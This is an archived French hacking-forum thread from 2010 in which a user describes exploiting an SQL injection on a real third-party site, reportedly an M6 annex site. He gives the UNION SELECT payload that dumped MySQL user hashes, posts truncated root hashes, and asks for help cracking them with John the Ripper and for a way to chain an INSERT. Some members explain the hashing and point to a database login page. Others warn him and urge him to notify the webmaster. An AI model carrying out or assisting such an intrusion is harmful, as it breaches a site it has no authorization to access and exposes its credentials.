logo Homepage
+  NewbieContest
|-+  Divers» Hacking» Mots de passe Mysql
Username:
Password:
Pages: [1]
  Imprimer  
Auteur Fil de discussion: Mots de passe Mysql  (Lu 4650 fois)
cendaar
Profil challenge

Classement : 5441/54254

Néophyte
*
Hors ligne Hors ligne
Messages: 5


Voir le profil
« le: 25 Septembre 2010 à 13:45:43 »

Bonjour

En fouillant un peu sur un site, j'ai trouvé une faille de type injection SQL. J'ai réussi à afficher le nom des tables et leur contenu.
A tout hasard je tente d'afficher les mots de passe BDD avec la formule qui marche jamais :

Citation
UNION SELECT 1,2,3,4,5,6,7,8,group_concat(host,0x3a,user,0x3a,password) from mysql.user--

Et il me sort les mots de passe...

Citation
localhost:root:*263D2170B73A27145FB[tronqué]
ns000000.ovh.net:root:*263D2170B73A27145FBB[tronqué] (j'ai rajouté les 0 mais j'ai l'adresse complète OVH)
127.0.0.1:root:*263D2170B73A27145FBB5[tronqué]
%:tempo:*627DB5DCC5B5AD5BA94[tronqué]
localhost:nom_de_compte:*D6EA5B04F792AB4985CC72A[tronqué]
%:autre_nom_de_compte:*678E265E9481438F90A2477[tronqué]
62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]

J'ai plusieurs questions par rapport à ca.
Pourquoi les mots de passe sont il encrypté ? J'ai fait tourner JTR toute la nuit avec le premier MDP mais sans résultat
Citation
Loaded 1 password hash (Raw SHA1 [raw-sha1 SSE2])

Quand je vais à cette adresse "ns000000.ovh.net" il me demande login/pass. J'ai essayé toute les combinaisons trouvé plus et rien ne marche... Il y a aussi cette ligne qui ne ressemble pas au autre "62.4.16.%:dernier_nom_de_compte:6be769f24e0[tronqué]" qu'est ce que c'est ?

Merci d'avance pour vos réponses
« Dernière édition: 25 Septembre 2010 à 14:09:24 par the lsd » Journalisée
the lsd
Administrateur

Profil challenge

Classement : 189/54254

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3096

poulping for fun & profit


Voir le profil WWW
« #1 le: 25 Septembre 2010 à 14:05:56 »

Mouais, c'est un peu limite comme post ça...
'fin bon, c'est juste une interrogation sur le pourquoi du comment, donc ça passe.

Pourquoi les mots de passe sont chiffrés ? Ben justement, pour avoir à les déchiffrer :p

Ensuite, c'est normal que tu n'arrives pas à rentrer sur ns000000.ovh.net. Ce sont les mots de passe mysql que tu as récupéré, donc, tu dois te connecter à la BDD, pas au site web.

Enfin, le % est surement un wildcard, c'est à dire 62.4.16.[0-255].

Par contre, je me demandes plutôt à quoi peuvent bien servir les étoiles devant les mdp.

Enjjoy

The lsd

PS : j'ai un peu modifié ton post, la liste des users/mdp est un peu trop parlante à mon goût
« Dernière édition: 25 Septembre 2010 à 14:10:25 par the lsd » Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
cendaar
Profil challenge

Classement : 5441/54254

Néophyte
*
Hors ligne Hors ligne
Messages: 5


Voir le profil
« #2 le: 25 Septembre 2010 à 14:25:38 »

Il me semblait qu'on pouvait accéder directement à la BDD de son serveur avec ce type d'adresse ns000000.ovh.net.
Merci pour ta réponse en tout cas. C'est vrai que les étoiles sont bizarre. Peut être que quelqu'un qui a un serveur chez OVH pourra m'en dire plus.
Journalisée
the lsd
Administrateur

Profil challenge

Classement : 189/54254

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3096

poulping for fun & profit


Voir le profil WWW
« #3 le: 25 Septembre 2010 à 14:37:11 »

Il me semblait qu'on pouvait accéder directement à la BDD de son serveur avec ce type d'adresse ns000000.ovh.net.
Ca je ne sais pas du tout, jamais eu de serv OVH. Mais il existe surement des webadmin SQL qui permettent de se connecter à partir d'un navigateur (d'ailleurs Google me donne son adresse : http://phpmyadmin.ovh.net/ )

Merci pour ta réponse en tout cas. C'est vrai que les étoiles sont bizarre. Peut être que quelqu'un qui a un serveur chez OVH pourra m'en dire plus.

Je viens de trouver la réponse dans la doc Mysql : http://dev.mysql.com/doc/refman/5.1/en/password-hashing.html Faut lire

Enjoy

The lsd

Edit : D'ailleurs, je cale pas trop l'intérêt de l'étoile, d'après la doc :

Citation
A second difference is that password hashes in the new format always begin with a “*” character, whereas passwords in the old format never do.

elle sert à différencier l'ancien et le nouveau format de hashage. Mais la longueur du hash (16 et 41 pour l'ancien et le nouveau) suffit amplement. Si quelqu'un a plus dinfos...
« Dernière édition: 25 Septembre 2010 à 14:40:23 par the lsd » Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
_o_
Relecteur

Profil challenge

Classement : 42/54254

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #4 le: 25 Septembre 2010 à 14:49:13 »

Pourquoi les mots de passe sont il encrypté ? J'ai fait tourner JTR toute la nuit avec le premier MDP mais sans résultat

Tu aurais aussi bien pu faire tourner JTR avec tous les mots de passe, ça ne te faisait pas perdre de temps.
Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
cendaar
Profil challenge

Classement : 5441/54254

Néophyte
*
Hors ligne Hors ligne
Messages: 5


Voir le profil
« #5 le: 25 Septembre 2010 à 15:14:22 »

Merci pour vos réponses. John ne veux pas se lancer avec plusieurs MDP en meme temps chez moi, voila pourquoi j'ai pris que le premier.

Du coup j'ai un doute sur le format que je dois donner à john :

Citation
DES/BSDI/MD5/BF/AFS/LM/NT/PO/raw-MD5/IPB2/raw-sha1/salt-sha1/md5a/KRB5/bfegg/nsldap/ssha/oracle/MYSQL/mysql-sha1/mscash/lotus5/DOMINOSEC/NETLM/NETNTLM/mssql/mssql05

Il s'est lancé en raw-sha1 mais est ce qu'il va pouvoir le trouver étant donné que l'algorithme de hashage de MySQL ressemblerait à ca d'après ce que j'ai lu :

Code:
function mysql_41_password($in)
{
$p=sha1($in,true);
$p=sha1($p);
return "*".strtoupper($p);
}
Journalisée
cendaar
Profil challenge

Classement : 5441/54254

Néophyte
*
Hors ligne Hors ligne
Messages: 5


Voir le profil
« #6 le: 25 Septembre 2010 à 15:55:49 »

aure petite question: Est ce qu'il y a un moyen de faire un INSERT INTO à la suite d'un SELECT? avec un UNION ou un AND par exemple?
Journalisée
_o_
Relecteur

Profil challenge

Classement : 42/54254

Membre Héroïque
*
Hors ligne Hors ligne
Messages: 1258


Voir le profil
« #7 le: 25 Septembre 2010 à 16:53:32 »

Franchement, n'attend pas trop de réponse de ce côté là.
Tu as trouvé une faille SQL ? Bien, préviens le webmaster.
Tu préfères l'exploiter ? C'est toi qui voit, tu sais ce que tu risques, je suppose ?
Journalisée

Les épreuves de hack de NC sont trop faciles ? Et pourtant ! Bienvenue dans la vraie vie : http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
Barti

Profil challenge

Classement : 240/54254

Membre Junior
**
Hors ligne Hors ligne
Messages: 79


Voir le profil
« #8 le: 25 Septembre 2010 à 16:58:09 »

Eh il m'as quand même dit hier sur le chan IRC que c'était sur M6 qu'il avait trouvé cette faille mdr
Journalisée

« Le bon sens, quoi qu'il fasse, ne peut manquer de se laisser surprendre à l'occasion. Le but de la science est de lui épargner cette surprise et de créer des processus mentaux qui devront être en étroit accord avec le processus du monde extérieur, de façon à éviter, en tout cas, l'imprévu »

]_-|Barti|-_[
cendaar
Profil challenge

Classement : 5441/54254

Néophyte
*
Hors ligne Hors ligne
Messages: 5


Voir le profil
« #9 le: 25 Septembre 2010 à 18:27:22 »

sur un site annexe de M6 plus précisément. Pourquoi prendre ce ton la Barti ?
Merci pour vos réponses
Journalisée
Pages: [1]
  Imprimer  
 
Aller à: